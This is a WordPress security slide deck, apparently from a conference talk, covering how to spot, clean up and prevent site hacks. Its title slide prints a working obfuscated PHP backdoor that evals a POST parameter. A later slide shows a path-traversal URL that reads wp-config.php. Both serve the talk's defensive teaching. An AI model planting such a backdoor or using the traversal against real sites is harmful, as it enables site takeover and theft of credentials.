Upload
angela-bowman
View
312
Download
0
Embed Size (px)
Citation preview
SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not hacked until you open the box and find out.
<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>
WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 — Version 2.2
Not a security expert, but I play one on WordPress.tv
Angela Bowman
Ask WP Girl @askwpgirl
THE VISION
The goal of the WordPress foundation is to:
democratize publishing through Open Source,
GPL software
THE CHALLENGE
effective democracy relies on an educated population with engaged participants
2007
0 4 8 12 16
COST OF DEMOCRACY100,000+ WordPress Sites
Compromised through Slider Revolution Security Vulnerability
800,000 banking credentials stolen using hacked WordPress sites
600,000 WordPress Websites Compromised through Fancybox Plugin
Security Vulnerability
http://www.databreachtoday.com/hackers-grab-800000-banking-credentials-a-7416
http://wptavern.com/hackers-hijack-fancybox-plugin-to-deface-wordpress-sites-with-isis-propaganda
RECENT VULNERABILITIES
Google Analytics WordPress 4.2.1
Backup to Dropbox FancyBox
TwentyFifteen
Revolution SliderGravity Forms
JetPack
https://wpvulndb.com/
WHAT DO HACKERS ACTUALLY DO?
Create new accounts with admin privileges
Reset passwords of multiple accounts
Inject malicious code into content
Add malicious code to existing files or new files
Redirect your website by editing .htaccess file
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
TYPICALLY, ONLY THE MOST SEVERELY HACKED
SITES WILL BE BLACKLISTED OR
SUSPENDED BY HOST Many hacks are hidden
Wordfence, Exploit Scanner, Sucuri (paid version best) plugins compare core, plugins, and themes to originals.
Scanners do not spot many hacks and are not a reliable way for determining if site is hacked or not.
Tip #1: Use a scanner tool
“SPOT THE HACK” TIPS
IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE
SITE CODE AND IT'S IMPOSSIBLE TO DETECT
THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
which of these files is
not like the others?
1. View files on server in FTP application (preferably w/ SFTP) or SSH
2. Find the file that is not like the others
3. Open the file.
Did you spot the hack?
lovely encoded hack
Tip #2: Which of these things is not like the other?
Hmmmm? PHP in a CSS folder?
Look for modified dates
Look for unusual names
Compare file list to original download
Look for file types that don’t belong
Check commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php
Any file can be hacked!
Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?
Tip #3: Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
Tip #4: Use Google!
Google Webmaster Tools/Search Console Search Queries – you can spot queries irrelevant to you site.Links to Your Site – you can find suspicious incoming links here.Internal Links – this report can help reveal rogue sections of your site.
site:yoursitename.com
Tip #5: Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
Tip #6: Search your site and click on site in search results page!
Some hacks simply redirect your siteSome hacks only show up on phones!
Hacked .htaccess file
USE CAUTION IF YOU KNOW YOU’RE HACKED
Disable javascript before hitting your site – don’t want to end up infecting your own computer while checking your site.
Even safer, use WC3 validator to inspect your HTML code and look for anything that seems out of place without actually executing any code.
IMMEDIATELY CHANGE PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress users, FTP, web hosting, control panel
Scan computer for viruses!
DIY HACK RECOVERYLogin via FTP
1 Backup:
Download everything. Good to
examine later for details of hack if
needed.
2 Delete all except:
cgi-bin.htaccess
wp-config.php(examine these)
3 Upload fresh:
WordPressThemesPlugins
cleaned uploads
RESEARCHFind key words or phrases in the hacked files
to find more information via Google.
Example: vpsp_version
Result: https://kb.sucuri.net/malware/signatures/php.backdoor.vpsp.001
See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK If hackers got admin access to site, you might
have to nuke the entire site from orbit — it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
MONITOR ACTIVITYUse a plugin to monitor site activity
Pay attention to error logs
View Raw Access logs regularly
SIMPLE SECURITY
Gravity Forms hack
I maintain dozens of sites, and none have ever been hacked.
Except, my personal landing page which I forgot about.
It had outdated Gravity Forms and got hacked.
Every WP install on my account got hacked because I forgot to update one site. It’s not that hard.
Keep sites on separate accounts!
UPDATE UPDATE UPDATE
Timely updates are critical for security. Tools: ManageWP, iControlWP, InfiniteWP, Jetpack
https://wordpress.org/plugins/plugin-vulnerabilities/
UPDATING PREMIUM THEMES AND PLUGINS
Often a manual process - Download and FTP new filesBundled plugins are not supported or auto updated
Enter license key/purchase code in settings to receive updates
SECURE YOUR LOGINOnline Generator:
http://www.pctools.com/guides/password/
Track Passwords: http://agilebits.com/products/1Password
Enable Two-Factor Authentication:http://askwpgirl.com/secure-wordpress-two-step-
authentication/
RUN A TIGHT SHIP!Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam filtering (Akismet plugin)
GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
EFFECTIVE SECURITY PLUGIN FEATURES
Limit login access
Block bad URL requests with a Firewall
Audit activity
Security through obscurity is not security
IP addresses don’t matter and should not be used as the foundation of a WordPress security policy
https://wordpress.org/plugins/wp-simple-firewall/
mywebsite.com/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
BACKUPSCommon wisdom is to backup your site
Backups are to your site what major medical health care coverage is to your health
Usually only helpful in case of a disaster
VaultPress and WorpDrive good
choices!
RESOURCEShttp://snipe.net/2010/01/when-wordpress-gets-hacked/ ***
https://support.google.com/webmasters/answer/163633?rd=1 ***
http://aw-snap.info/articles/find-backdoor.php
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://sucuri.net - free scan, hack recovering, site monitoring
http://aswkpgirl.com/nuke-it-from-orbit
https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/
https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/
About the banking hack: https://www.proofpoint.com/es/node/327
Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc
CONTACTfacebook.com/askwpgirl
twitter.com/askwpgirl
http://askwpgirl.com
http://boulderdigitalarts.com
One-on-One consulting third Friday of every month at Boulder Digital Arts
Six-week theme customization course in Colorado and online.
SEO and Best Maintenance Tips Newsletter http://askwpgirl.com
These slides: http://www.slideshare.net/askwpgirl-boulder/security-wcdenver2015